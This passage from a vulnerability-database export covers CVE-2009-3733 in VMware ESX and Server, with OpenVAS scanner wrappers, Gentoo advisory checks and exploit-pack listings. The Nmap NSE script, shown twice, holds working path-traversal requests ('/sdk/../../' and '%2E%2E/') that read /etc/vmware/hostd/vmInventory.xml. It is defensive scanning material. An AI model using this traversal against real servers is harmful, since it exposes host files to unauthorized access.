(its\nchosen max is ignored).\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\";\n\nif(description)\n{\n script_id(104150);\n script_version(\"$Revision: 5505 $\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-07 11:00:18 +0100 (Tue, 07 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"http.pipeline\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http.useragent\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http-max-cache-size\", value:\"\", type:\"entry\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n pref = script_get_preference(\"http.pipeline\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.pipeline\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http.useragent\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.useragent\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http-max-cache-size\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http-max-cache-size\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"http-vmware-path-vuln\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"http-vmware-path-vuln\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (http-vmware-path-vuln.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104150\");\n script_version(\"2020-07-07T14:13:50+0000\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"2020-07-07 14:13:50 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"http://fyrmassociates.com/tools.html\");\n\n script_tag(name:\"summary\", value:\"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:51:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201209-25.", "modified": "2017-07-07T00:00:00", "published": "2012-10-03T00:00:00", "id": "OPENVAS:72459", "href": "http://plugins.openvas.org/nasl.php?oid=72459", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been found in VMware Player, Server,\nand Workstation, allowing remote and local attackers to conduct several\nattacks, including privilege escalation, remote execution of arbitrary\ncode, and a Denial of Service.\";\ntag_solution = \"Gentoo discontinued support for VMware Player. We recommend that users\nunmerge VMware Player:\n\n # emerge --unmerge 'app-emulation/vmware-player'\n \n\nNOTE: Users could upgrade to > =app-emulation/vmware-player-3.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Workstation. We recommend that\nusers unmerge VMware Workstation:\n\n # emerge --unmerge 'app-emulation/vmware-workstation'\n \n\nNOTE: Users could upgrade to > =app-emulation/vmware-workstation-7.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Server. We recommend that users\n unmerge VMware Server:\n\n # emerge --unmerge 'app-emulation/vmware-server'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201209-25\nhttp://bugs.gentoo.org/show_bug.cgi?id=213548\nhttp://bugs.gentoo.org/show_bug.cgi?id=224637\nhttp://bugs.gentoo.org/show_bug.cgi?id=236167\nhttp://bugs.gentoo.org/show_bug.cgi?id=245941\nhttp://bugs.gentoo.org/show_bug.cgi?id=265139\nhttp://bugs.gentoo.org/show_bug.cgi?id=282213\nhttp://bugs.gentoo.org/show_bug.cgi?id=297367\nhttp://bugs.gentoo.org/show_bug.cgi?id=335866\nhttp://bugs.gentoo.org/show_bug.cgi?id=385727\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201209-25.\";\n\n \n \nif(description)\n{\n script_id(72459);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-5269\", \"CVE-2007-5503\", \"CVE-2007-5671\", \"CVE-2008-0967\", \"CVE-2008-1340\", \"CVE-2008-1361\", \"CVE-2008-1362\", \"CVE-2008-1363\", \"CVE-2008-1364\", \"CVE-2008-1392\", \"CVE-2008-1447\", \"CVE-2008-1806\", \"CVE-2008-1807\", \"CVE-2008-1808\", \"CVE-2008-2098\", \"CVE-2008-2100\", \"CVE-2008-2101\", \"CVE-2008-4915\", \"CVE-2008-4916\", \"CVE-2008-4917\", \"CVE-2009-0040\", \"CVE-2009-0909\", \"CVE-2009-0910\", \"CVE-2009-1244\", \"CVE-2009-2267\", \"CVE-2009-3707\", \"CVE-2009-3732\", \"CVE-2009-3733\", \"CVE-2009-4811\", \"CVE-2010-1137\", \"CVE-2010-1138\", \"CVE-2010-1139\", \"CVE-2010-1140\", \"CVE-2010-1141\", \"CVE-2010-1142\", \"CVE-2010-1143\", \"CVE-2011-3868\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-03 11:11:29 -0400 (Wed, 03 Oct 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-player\", unaffected: make_list(), vulnerable: make_list(\"le 2.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-workstation\", unaffected: make_list(), vulnerable: make_list(\"le 6.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-server\", unaffected: make_list(), vulnerable: make_list(\"le 1.0.9.156507\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201209-25.", "modified": "2018-10-12T00:00:00", "published": "2012-10-03T00:00:00", "id": "OPENVAS:136141256231072459", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231072459", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201209_25.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.72459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-5269\", \"CVE-2007-5503\", \"CVE-2007-5671\", \"CVE-2008-0967\", \"CVE-2008-1340\", \"CVE-2008-1361\", \"CVE-2008-1362\", \"CVE-2008-1363\", \"CVE-2008-1364\", \"CVE-2008-1392\", \"CVE-2008-1447\", \"CVE-2008-1806\", \"CVE-2008-1807\", \"CVE-2008-1808\", \"CVE-2008-2098\", \"CVE-2008-2100\", \"CVE-2008-2101\", \"CVE-2008-4915\", \"CVE-2008-4916\", \"CVE-2008-4917\", \"CVE-2009-0040\", \"CVE-2009-0909\", \"CVE-2009-0910\", \"CVE-2009-1244\", \"CVE-2009-2267\", \"CVE-2009-3707\", \"CVE-2009-3732\", \"CVE-2009-3733\", \"CVE-2009-4811\", \"CVE-2010-1137\", \"CVE-2010-1138\", \"CVE-2010-1139\", \"CVE-2010-1140\", \"CVE-2010-1141\", \"CVE-2010-1142\", \"CVE-2010-1143\", \"CVE-2011-3868\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-03 11:11:29 -0400 (Wed, 03 Oct 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201209-25 (vmware-server vmware-player vmware-workstation)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been found in VMware Player, Server,\nand Workstation, allowing remote and local attackers to conduct several\nattacks, including privilege escalation, remote execution of arbitrary\ncode, and a Denial of Service.\");\n script_tag(name:\"solution\", value:\"Gentoo discontinued support for VMware Player. We recommend that users\nunmerge VMware Player:\n\n # emerge --unmerge 'app-emulation/vmware-player'\n\n\nNOTE: Users could upgrade to > =app-emulation/vmware-player-3.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Workstation. We recommend that\nusers unmerge VMware Workstation:\n\n # emerge --unmerge 'app-emulation/vmware-workstation'\n\n\nNOTE: Users could upgrade to > =app-emulation/vmware-workstation-7.1.5,\nhowever these packages are not currently stable.\n\nGentoo discontinued support for VMware Server. We recommend that users\n unmerge VMware Server:\n\n # emerge --unmerge 'app-emulation/vmware-server'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201209-25\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=213548\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=224637\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=236167\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=245941\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=265139\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=282213\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=297367\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=335866\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=385727\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201209-25.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-player\", unaffected: make_list(), vulnerable: make_list(\"le 2.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-workstation\", unaffected: make_list(), vulnerable: make_list(\"le 6.5.5.328052\"))) != NULL ) {\n report += res;\n}\nif((res = ispkgvuln(pkg:\"app-emulation/vmware-server\", unaffected: make_list(), vulnerable: make_list(\"le 1.0.9.156507\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2019-05-30T17:05:23", "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733). \n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n## Example Usage \n \n \n nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\n \n\n## Script Output \n \n \n | http-vmware-path-vuln:\n | VMWare path traversal (CVE-2009-3733): VULNERABLE\n | /vmware/Windows 2003/Windows 2003.vmx\n | /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\n | /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\n | /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\n | /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\n | /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\n |_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\n \n\n## Requires \n\n * http\n * nmap\n * shortport\n * stdnse\n * string\n * table\n\n* * *\n", "edition": 8, "published": "2010-02-16T14:42:10", "title": "http-vmware-path-vuln NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-VMWARE-PATH-VULN.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vmware-path-vuln.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\n]]\n\n---\n-- @usage\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\n--\n-- @output\n-- | http-vmware-path-vuln:\n-- | VMWare path traversal (CVE-2009-3733): VULNERABLE\n-- | /vmware/Windows 2003/Windows 2003.vmx\n-- | /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\n-- | /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\n-- | /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\n-- | /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\n-- | /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\n-- |_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\n\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {\"http\", \"https\"})\n\nlocal function get_file(host, port, path)\n local file\n\n -- Replace spaces in the path with %20\n path = string.gsub(path, \" \", \"%%20\")\n\n -- Try both ../ and %2E%2E/\n file = \"/sdk/../../../../../../\" .. path\n\n local result = http.get( host, port, file)\n if(result['status'] ~= 200 or result['content-length'] == 0) then\n file = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\" .. path\n result = http.get( host, port, file)\n\n if(result['status'] ~= 200 or result['content-length'] == 0) then\n return false, \"Couldn't download file: \" .. path\n end\n end\n\n return true, result.body, file\nend\n\nlocal function fake_xml_parse(str, tag)\n local result = {}\n local index, tag_start, tag_end\n\n -- Lowercase the 'body' we're searching\n local lc = string.lower(str)\n -- Lowercase the tag\n tag = string.lower(tag)\n\n -- This loop does some ugly pattern-based xml parsing\n index, tag_start = string.find(lc, \"<\" .. tag .. \">\")\n while index do\n tag_end, index = string.find(lc, \"</\" .. tag .. \">\", index)\n table.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\n index, tag_start = string.find(lc, \"<\" .. tag .. \">\", index)\n end\n\n return result\nend\n\n--local function parse_vmware_conf(str, field)\n-- local index, value_start = string.find(str, field .. \"[^\\\"]*\")\n-- if(not(index) or not(value_start)) then\n-- return nil\n-- end\n--\n-- local value_end = string.find(str, \"\\\"\", value_start + 1)\n-- if(not(value_end)) then\n-- return nil\n-- end\n--\n-- return string.sub(str, value_start + 1, value_end - 1)\n--end\n\nlocal function go(host, port)\n local result, body\n local files\n\n -- Try to download the file\n result, body = get_file(host, port, \"/etc/vmware/hostd/vmInventory.xml\");\n -- It failed -- probably not vulnerable\n if(not(result)) then\n return false, \"Couldn't download file: \" .. body\n end\n\n -- Check if the file contains the proper XML\n if(string.find(string.lower(body), \"configroot\") == nil) then\n return false, \"Server didn't return XML -- likely not vulnerable.\"\n end\n\n files = fake_xml_parse(body, \"vmxcfgpath\")\n\n if(#files == 0) then\n return true, {\"No VMs appear to be installed\"}\n end\n\n -- Process each of the .vmx files if verbosity is on\n --if(nmap.verbosity() > 1) then\n -- local result, file = get_file(host, port, files[1])\n -- io.write(nsedebug.tostr(file))\n --end\n\n return true, files\nend\n\naction = function(host, port)\n -- Try a standard ../ path\n local status, result = go(host, port)\n\n if(not(status)) then\n return nil\n end\n\n local response = {}\n table.insert(response, \"VMWare path traversal (CVE-2009-3733): VULNERABLE\")\n\n if(nmap.verbosity() > 1) then\n table.insert(response, result)\n end\n\n return stdnse.format_output(true, response)\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "d2": [{"lastseen": "2019-05-29T17:19:06", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "description": "**Name**| d2sec_vmware_dirtrav \n---|--- \n**CVE**| CVE-2009-3733 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| VmWare Server Directory Traversal \n**Notes**| \n", "edition": 2, "modified": "2009-11-02T15:30:00", "published": "2009-11-02T15:30:00", "id": "D2SEC_VMWARE_DIRTRAV", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_vmware_dirtrav", "title": "DSquare Exploit Pack: D2SEC_VMWARE_DIRTRAV", "type": "d2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "description": "**Name**| d2sec_vmware \n---|--- \n**CVE**| CVE-2009-3733 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| VmWare Server Directory Traversal \n**Notes**| \n", "edition": 2, "modified": "2009-11-02T15:30:00", "published": "2009-11-02T15:30:00", "id": "D2SEC_VMWARE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_vmware", "title": "DSquare Exploit Pack: D2SEC_VMWARE", "type": "d2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T18:55:16", "description": "VMware Server 2.0.1,ESXi Server 3.5 Directory Traversal Vulnerability. CVE-2009-3733. Remote exploits for multiple platform", "published": "2009-10-27T00:00:00", "type": "exploitdb", "title": "VMware Server <= 2.0.1,ESXi Server <= 3.5 - Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "modified": "2009-10-27T00:00:00", "id": "EDB-ID:33310", "href": "https://www.exploit-db.com/exploits/33310/", "sourceData": "source: http://www.securityfocus.com/bid/36842/info\r\n\r\nVMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.\r\n\r\nExploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.\r\n\r\ndescription = [[\r\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\r\n]]\r\n\r\n---\r\n-- @usage\r\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\r\n--\r\n-- @output\r\n--| http-vmware-path-vuln: \r\n--| VMWare path traversal (CVE-2009-3733): VULNERABLE\r\n--| /vmware/Windows 2003/Windows 2003.vmx\r\n--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\r\n--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\r\n--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\r\n-----------------------------------------------------------------------\r\n\r\nauthor = \"Ron Bowes\"\r\nlicense = \"Same as Nmap--See http://www.exampel.com/book/man-legal.html\"\r\ncategories = {\"vuln\", \"safe\", \"default\"}\r\n\r\nrequire \"http\"\r\nrequire \"shortport\"\r\n\r\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {\"http\", \"https\"})\r\n\r\nlocal function get_file(host, port, path)\r\n\tlocal file\r\n\r\n\t-- Replace spaces in the path with %20\r\n\tpath = string.gsub(path, \" \", \"%%20\")\r\n\r\n\t-- Try both ../ and %2E%2E/\r\n\tfile = \"/sdk/../../../../../../\" .. path\r\n\r\n\tlocal result = http.get( host, port, file)\r\n\tif(result['status'] ~= 200 or result['content-length'] == 